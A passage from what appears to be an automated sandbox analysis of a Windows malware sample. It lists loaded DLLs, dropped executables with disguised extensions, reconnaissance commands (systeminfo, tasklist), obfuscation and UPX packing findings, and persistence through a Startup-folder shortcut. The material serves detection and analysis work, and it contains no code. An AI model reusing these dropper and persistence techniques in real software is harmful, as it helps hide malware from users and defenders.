Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: version.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1245183 > 1048576
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C.pdb source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp, nircmdc.exe.52.dr
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
PE file contains an invalid checksum
Source: 7zxa.dll.52.dr Static PE information: real checksum: 0x0 should be: 0x316b6
Source: 7za.dll.52.dr Static PE information: real checksum: 0x0 should be: 0x4352d
Source: zip.exe.52.dr Static PE information: real checksum: 0x0 should be: 0x30da3
Source: nircmdc.exe.52.dr Static PE information: real checksum: 0x0 should be: 0x157f0
Source: file.exe Static PE information: real checksum: 0x138e94 should be: 0x139977
Source: 7za.exe.52.dr Static PE information: real checksum: 0x0 should be: 0xae01b
PE file contains sections with non-standard names
Source: 7zxa.dll.52.dr Static PE information: section name: .sxdata
Source: 7za.dll.52.dr Static PE information: section name: .sxdata
Source: 7za.exe.52.dr Static PE information: section name: .sxdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0041B280 push eax; ret 52_2_0041B2AE
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_3_007F990C push ebp; iretd 88_3_007F990D
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_3_0080E110 push ds; iretd 88_3_0080E122
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_3_0080C340 push eax; ret 88_3_0080C341
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_3_007FC7AC push ebp; iretd 88_3_007FC7AD
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_3_0080C364 push eax; ret 88_3_0080C365
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\303482\Either.pif Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Jump to dropped file
Drops PE files
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe File created: C:\Users\user\AppData\Roaming\DolphinDumps\zip.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe File created: C:\Users\user\AppData\Roaming\DolphinDumps\7za.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Rocky Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe File created: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\303482\Either.pif Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe File created: C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe File created: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe File created: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe File created: C:\Users\user\AppData\Roaming\DolphinDumps\7za.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Rocky Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url Jump to behavior
Stores files to the Windows start menu directory
